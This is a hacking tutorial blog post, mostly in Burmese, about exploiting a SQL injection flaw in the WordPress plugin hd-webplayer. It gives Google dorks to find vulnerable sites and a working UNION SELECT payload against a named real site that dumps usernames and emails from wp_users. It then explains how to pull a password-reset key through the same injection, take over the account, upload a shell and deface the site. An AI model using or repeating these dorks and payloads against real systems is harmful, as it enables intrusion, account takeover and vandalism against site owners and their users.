# Dork 1 (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="
# Dork 2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="
# Dork 3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"
အိုေက ... ကြ်န္ေတာ္တို ့ ဆိုက္တစ္ခုကို ၀င္လုိက္ျပီဗ်ာ...
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=3
SQL ေပါက္မေပါက္ စမ္းႀကည့္တာေပါ့... အရင္လိုပဲ အရင္တုိင္းပဲ :D
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=3'
Injection ထိုးရမယ့္ ကုဒ္ေလးက ဒီလိုေလး
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
အဲလိုဆို ကြ်န္ေတာ္တို့ user ေတြ ေတြ ့ရျပီ
အဲဒါေလးေတြကိုမွတ္ထားလိုက္ဗ်ာ... ျပီးရင္ Login page ကိုသြားလိုက္
lost password ကိုႏွိပ္လိုက္
ျပီးရင္ ခုနက ရထားတဲ့ ေမးလ္ ကိုထည့္လိုက္...
Get New Password ကိုႏွိပ္လိုက္.... အာ့ဆို password reset ခ်ဖို ့ link ကို ေမးလ္ပို့လိမ့္မယ္..
"Check your e-mail for the confirmation link."
အဲဒီ သေဘာက password reset ခ်ဖို ့ Activation Key ကိုေမးလ္ထဲပို့လိုက္ျပီေပါ့... အခု အဲဒီ Key ကို ရေအာင္ ႀကည့္ႀကတာေပါ့..
ခုနက ကြ်န္ေတာ္တို ့ထိုးတဲ့ link ကိုျပန္သြားႀကည့္....
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
အဲမွာေတြ ့ေနရျပီေနာ္...
ျပီးရင္ ဒီအတိုင္းလင့္ကို ေျပာင္းလိုက္
site.com/wp-login.php?action=rp&key=resetkey&login=username
password reset ခ်လို ့ရျပီဗ်ာ...
ေျပာင္းထားတဲ့ password နဲ့ ျပန္၀င္ျပီး shell တင္ deface အုပ္...
D0n3!
No comments:
Post a Comment